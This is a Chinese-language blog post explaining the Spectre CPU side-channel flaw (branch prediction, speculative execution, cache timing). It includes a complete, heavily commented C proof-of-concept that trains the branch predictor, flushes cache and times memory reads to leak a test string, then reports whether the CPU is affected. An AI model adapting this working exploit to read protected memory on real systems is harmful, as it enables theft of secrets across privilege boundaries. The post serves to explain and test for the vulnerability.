最近比较火的CPU漏洞解析,附带修改过带注释源码一份

最新推荐文章于 2024-08-05 20:31:21 发布
最新推荐文章于 2024-08-05 20:31:21 发布
阅读量3.5k 收藏 14
点赞数 4
分类专栏: windows 安全 linux 文章标签: CPU漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25827741/article/details/78994970
版权
windows 同时被 3 个专栏收录
2 篇文章 0 订阅
订阅专栏
linux
2 篇文章 0 订阅
订阅专栏
安全
1 篇文章 0 订阅
订阅专栏
先说结果,由于CPU乱序执行和分支预测功能,可以通过判断需要读取的页面是否被 cache 缓存来判断内存中存在什么内容。
简单粗暴,直接上本帅改过的代码,含中文注释,不谢。

另外膜拜下这份源码的大神。

再另外一下,乱序执行和分支预测现在CPU基本都有,目的是为了让执行单元全速执行避免浪费时间等待数据获取,BUG的重点就在于这两个功能使得 cache 缓存了本来没有权限获取的地址数据(PS:权限检查是在数据进入core的寄存器时进行,这也是为什么说此BUG是架构问题,架构设计cache不检查权限),然而cache的数据和非cache的数据core在获取时,时间上相差N倍(根据本帅的CPU测试结果能相差3倍甚至以上),故可以判断数据缓存情况,从而可以用字典判断到底缓存的什么(这句看不懂请看代码)

/*
	modify by:CSZQ
*/
/*
	配置
*/
#define __DEBUG			0												// 调试模式开关,会打开额外输出
#define __TRYTIMES		50												// 每个字符尝试读取次数
/*
	测试读取的数据
*/
#define __MAGICWORDS	"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"		
#define __MAGICWORDSCOUNT (sizeof(__MAGICWORDS) - 1)				// 测试数据长度
/*
	cache 命中阀值,是一个经验值,不成功9.9可能这里不对,默认值 50 ,可以通过 -t 传参修改
	该数值与内存质量、CPU多项参数有关,是一个经验值,下面给出一些基于本帅移动端的 CPU Intel I7-4700MQ 给出的参数取值
	取值大致范围:16 - 176
*/
#define CACHE_HIT_THRESHOLD (50)


/*
	头文件
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <intrin.h>
#pragma optimize("gt",on)


/*
	全局变量
*/
unsigned int array1_size = 16;											// 排除 ASCII 码表前 16 个字符
uint8_t array1[160]      = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };	// 一个字典
uint8_t array2[256 * 512];												// 256 对应 ASCII 码表
const char *secret       = __MAGICWORDS;								// 测试读取的数据
int iThreshold           = CACHE_HIT_THRESHOLD;							// 读取时间阀值


/*
	使用 temp 全局变量阻止编译器优化 victim_function()
*/
uint8_t temp = 0;

void victim_function(size_t x) {

	/*
		x 取值 0 - 15 时 获取 arrary2 的 1 - 16 分组 & temp 后赋值给 temp
		temp 一直为 0
		发生 evil 分支预测:
		array1[x] 在 5 次分支预测时加载的值就是当前需要读取的虚拟地址
		array2[array1[x] * 512] 在 5 次分支预测期间读取的是 标准ASCII 0 - 127 * 512 所在地址的 array2 数组内容
		其他分支预测:
		array1[x] cache 中的是根据尝试次数获取到的正常 array1 数组标准值
		array2[array1[x] * 512] 在cache中缓存的是 ASCII 码表 1 - 16 号字符
	*/
	if (x < array1_size) {
		temp &= array2[array1[x] * 512];
	}
}


void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
	static int results[256];											// 对应 ASCII 码表
	int tries, i, j, k, mix_i;
	unsigned int junk = 0;
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t *addr;

	for (i = 0; i < 256; i++)
		results[i] = 0;

	/*
		每个字符多次尝试获取以增加成功率
	*/
	for (tries = __TRYTIMES; tries > 0; tries--) {

		/*
			清空 array2 的每 512 字节首地址 cache
		*/
		for (i = 0; i < 256; i++)
			_mm_clflush(&array2[i * 512]);								// _mm_clflush:Invalidate and flush the cache line that contains p from all levels of the cache hierarchy

		training_x = tries % array1_size;

		/*
			训练 CPU 缓存需要的数据
		*/
		for (j = 29; j >= 0; j--) {
			_mm_clflush(&array1_size);									// 清空 array1_size 的缓存

			/*
				100 次内存取值用作延时,确保 cache 页全部换出
			*/
			for (volatile int z = 0; z < 100; z++) {}

			/*
				在这一步:
				j % 6 =  0 则 x = 0xFFFF0000
				j % 6 != 0 则 x = 0x00000000
				Avoid jumps in case those tip off the branch predictor
			*/
			x = ((j % 6) - 1) & ~0xFFFF;

			/*
				到这里:
				j % 6 =  0 则 x = 0xFFFFFFFF
				j % 6 != 0 则 x = 0x00000000
			*/
			x = (x | (x >> 16));

			/*
				最后:
				j % 6 =  0 则 x = malicious_x
				j % 6 != 0 则 x = training_x
			*/
			x = training_x ^ (x & (malicious_x ^ training_x));

			/*
				调用触发 cache 代码
				共计触发 5 次,j = 24、18、12、6、0时,都会触发分支预测
			*/
			victim_function(x);
		}
		/*
			退出此函数时 cache 中已经缓存了需要越权获取的数据
		*/

		/*
			读取时间。执行顺序轻微混淆防止 stride prediction(某种分支预测方法)
			i 取值 0 - 255 对应 ASCII 码表
		*/
		for (i = 0; i < 256; i++) {
			/*
				TODO: 贼NB的数学游戏,值得叫 666
				167  0xA7  1010 0111
				13   0x0D  0000 1101
				取值结果为 0 - 255 随机数且不重复
			*/
			mix_i = ((i * 167) + 13) & 255;

			/*
				addr 取 arrary2 中 0-255 组的首地址
			*/
			addr = &array2[mix_i * 512];

			/*
				junk 保存 TSC_AUX 寄存器值
				time1 保存当前时间戳
			*/
			time1 = __rdtscp(&junk);

			/*
				获取数据,用以测试时间
			*/
			junk = *addr;

			/*
				记录并获取耗时
			*/
			time2 = __rdtscp(&junk) - time1;

			/*
				判断是否命中,且 mix_i 不能取 1 - 16,因为 1 - 16 在获取时是无效的
			*/
			if (time2 <= iThreshold && mix_i != array1[tries % array1_size])
				/*
				cache arrary2中的 0-255 项命中则 +1 分
				*/
				results[mix_i]++;
		}

		/*
			获取分组中命中率最高的两个分组,分别存储在 j(最高命中),k(次高命中) 里
		*/
		j = k = -1;
		for (i = 0; i < 256; i++) {
			if (j < 0 || results[i] >= results[j]) {
				k = j;
				j = i;
			}
			else if (k < 0 || results[i] >= results[k]) {
				k = i;
			}
		}

		/*
			最高命中项命中次数大于 2 倍加 5 的次高命中项次数
			或
			仅仅最高命中项命中 2 次
			则
			退出循环,成功找到命中项
		*/
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
	}

	/*
		使用 junk 防止优化输出
	*/
	results[0] ^= junk;
	value[0] = (uint8_t)j;//最高命中项
	score[0] = results[j];//最高命中项命中次数
	value[1] = (uint8_t)k;//次高命中项
	score[1] = results[k];//次高命中项命中次数
}


int main(int argc, const char **argv) {
	size_t malicious_x = (size_t)(secret - (char*)array1); /* 相对地址 */
	int i, score[2], iLen = __MAGICWORDSCOUNT, iCount = 0;
	char *opt;
	uint8_t value[2];

	/*
		参数解析
	*/
	if (argc > 1) {
		opt = (char*)&argv[1][1];
		switch (*opt) {
		case 'h':
			printf("-h  help\n-t 设置阀值,建议取值 16 - 176 之间,默认 50\n");
			return 0;
		case 't':
			if (argc==2) {
				sscanf(opt + 1, "%d", &iThreshold);
			} 
			else {
				sscanf(argv[2], "%d", &iThreshold);
			}
			break;
		}
	}

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* 避免写时复制 */

#if __DEBUG > 0
	printf("Reading %d bytes:\n", iLen);
#endif
	i = iLen;
	while (--i >= 0) {

#if __DEBUG > 0
		printf("读取地址:%p ", (void*)malicious_x);
#endif

		readMemoryByte(malicious_x++, value, score);
		char* addr = (char*)array1 + malicious_x - 1;
		if (value[0] == *addr) {
			iCount += (score[0] > 2 * score[1]) ? 1 : 0;
		}
		
#if __DEBUG > 0
		/*
			如果最高命中项命中次数大于等于 2 倍的次高命中项,认为分支预测成功
		*/
		printf("%s: ", (score[0] >= 2 * score[1] ? "成功" : "...."));
		printf("value:0x%02X char=%c counts=%d ", value[0],
			((value[0] > 31 && value[0] < 127) ? (char)value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(可能:value:0x%02X char=%c counts=%d)", value[1], ((value[0] > 31 && value[0] < 127) ? (char)value[0] : '?'), score[1]);
		printf("\n");
#endif
	}
	/*
		命中次数超过 1/5 认为存在BUG,过低有可能是巧合或阀值需要调整
	*/
	printf("%s\r\n", (iCount >= __MAGICWORDSCOUNT / 5) ? "--->存在BUG!<---" : "--->不存在BUG<---");
	printf("%d 阀值下命中率为:%d / %d\r\n", iThreshold, iCount, iLen);
	printf("按任意键退出程序...\r\n");
	getchar();

	return (0);
}

这篇文章不错,但是本帅没积分,请直接复制以上代码。

这篇文章不错,决定赠送给作者积分请点击以下链接下载:

http://download.csdn.net/download/qq_25827741/10192872

创世之枪
关注
专栏目录
30道2020年腾讯PHP面试题整理(附带答案)
JineD的博客
10-19 7006
一、PHP开发部分 1.合并两个数组有几种方式,试比较它们的异同 答: 1)array_merge() 2)’+’ 3)array_merge_recursive array_merge 简单的合并数组 array_merge_recursive 合并两个数组,如果数组中有完全一样的数据,将它们递归合并 array_combine 和 ‘+’ :合并两个数组,前者的值作为新数组的键 2.请写一个函数来检查用户提交的数据是否为整数(不区分数据类型,可以为二进制、八进制、十进制、十六进制数字)
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 7706
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
一个CPU卡的源代码
09-07
读写cpu卡的源代码!!!读写cpu卡的源代码!!!读写cpu卡的源代码!!!
Intel提供的获取某台机器CPU数量的源代码
weixin_34352005的博客
01-07 119
//------------------------------------------------------------------------------------------------- // // Copyright ?2001, Intel Corporation . Other brands and names may be claimed as the property of ...
都说计算机今年炸了,究竟炸到什么程度呢
最新发布
QXXXD的博客
08-05 519
近期,最大的计算机领域新闻莫过于Intel CPU严重漏洞曝光。该漏洞被称为“Meltdown”和“Spectre”,几乎涵盖了所有使用Intel芯片的计算机,包括PC、笔记本电脑、服务器和移动设备。Meltdown漏洞的主要风险是黑客可以利用此漏洞访问操作系统的核心内存,从而获得操作系统中存储的所有敏感数据,如密码、私钥、加密密钥等。而Spectre则可以允许攻击者通过危险的JavaScript代码从一个网站窃取另一个网站的信息。
自己动手写CPU的源代码
10-11
自己动手写CPU的源代码,一共15章,可以完整实现MIPS的指令
cpu源代码分析
03-16
cpu流水线设计,verilog程序,并带有时序和布线
cpu 控件源代码(可直接运行)
04-01
custom_cpu_widget::custom_cpu_widget(QWidget *parent) : QWidget(parent) { this->w_width = 80; this->w_height = 100; resize(QSize(this->w_width, this->w_height)); setFixedSize(this->w_width, this->w_height); this->cpu_used_level = 10; } // [public start] void custom_cpu_widget::cpu_set_widget_level(int level) { this->cpu_used_level = level; this->repaint(); }
JavaScript面试题
qq_44417271的博客
04-06 6946
. 1.数据类型有哪几种, 检测方法是什么?? 基本数据类型 ​ ES5-------Number/Boolean/String/Undefined/Null ​ ES6新增—symbol 引用数据类型 ​ Object ​ 检测方法4种 1、Object.prototype.toString.call() **作用: 可以检测所有数据类型** **所有数据类型都可以检测,而且非常正确** 语法: Object.prototype.toString.call(
PHP 面试知识点整理归纳
热门推荐
PHP学习日志——地雷
09-05 1万+
全文已整理补充完毕,以后还会继续更新文章里面的错误,以及补充尚不完善的问题。 该篇文章是针对Github上wudi/PHP-Interview-Best-Practices-in-China资源的答案个人整理 lz也是初学者,以下知识点均为自己整理且保持不断更新,也希望各路大神多多指点,若发现错误或有补充,可直接comment,lz时刻关注着。 由于内容比较多,没有直接目录,请自行对照 Gi...
前端面试总结
czy19970301的博客
09-16 2249
注册登录是怎么实现的 1.登陆注册要做成受控组件,组件定义state,和表单绑定 2.redux-saga调用数据请求,发送action修改数据, useEffect中dispatch发送数据请求,后端比对用户名是否重复,返回state 3.前端根据返回的信息成功跳转登陆页 4.登陆发送数据请求,数据库对比用户名密码是否正确, 根据后端返回的结果进入首页 5.setCookie将用户登录名密码token存cookie中 通过JWT(Json web token) 6.免密登陆 getC
CPU源代码分析与芯片设计及Linux移植》
01-30
CPU源代码分析与芯片设计及Linux移植》 倪继利
中国卫星所用CPU的源代码,航天级开源CPU(ERC32,leon)的vhdl代码和资料
11-14
中国几乎所有卫星用的都是一款基于sparc v7体系结构的开源CPU:ERC32。本资源所含其资料和代码,另外也含有leon2 cpu源码! 是了解卫星所用CPU的源代码,研究航天级开源CPU(ERC32,leon)的好资料。
CPU课程设计源代码
12-26
采用MIPS架构的流水线CPU设计,包含所有源代码。使用VHDL语言
CPU_Z
03-23
NULL 博文链接:https://tianjun309.iteye.com/blog/1070648
cpu-z_1.91-en_CPU-Z_
10-02
programm for windows
Intel CPU漏洞介绍
小宇宙的专栏
01-16 2000
Intel CPU漏洞 简介:关于最近接连爆出的CPU漏洞,做一个简单的介绍。 CPU漏洞介绍 最近听说的两个CPU漏洞,一个是熔断漏洞(Meltdown),一个是幽灵漏洞(Spectre)。 熔断漏洞利用CPU乱序执行技术的缺陷,破坏了内存隔离机制,使恶意程序可越权访问操作系统内存数据,造成敏感信息泄露。 幽灵漏洞利用CPU推测执行技术的设计缺陷,破坏了不同应用程序间的逻辑
CPU漏洞解释
公众号shadow sock7
01-24 910
## Spectre > 根源在于CPU的『推测执行』。 场景: ``` if (a =1 ){     a1(); } else {     b(); } ``` 原本,对于各个进程来说,某个进程是无法访问其他进程的内存的。 CPU速度太快,RAM跟不上CPU的节奏。CPU在碰到分支语句需要进行条件判断的时候,CPU等不及要执行下去了(不执行的话就只能休息,浪费了C
CPU漏洞详解
宋宝华
10-03 5438
1. 导言性能测试对于 Linux 发行版来说至关重要,Alibaba Cloud Linux 2 也是如此。(Alibaba Cloud Linux 2 是阿里巴巴操作系统团队推出的一款...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值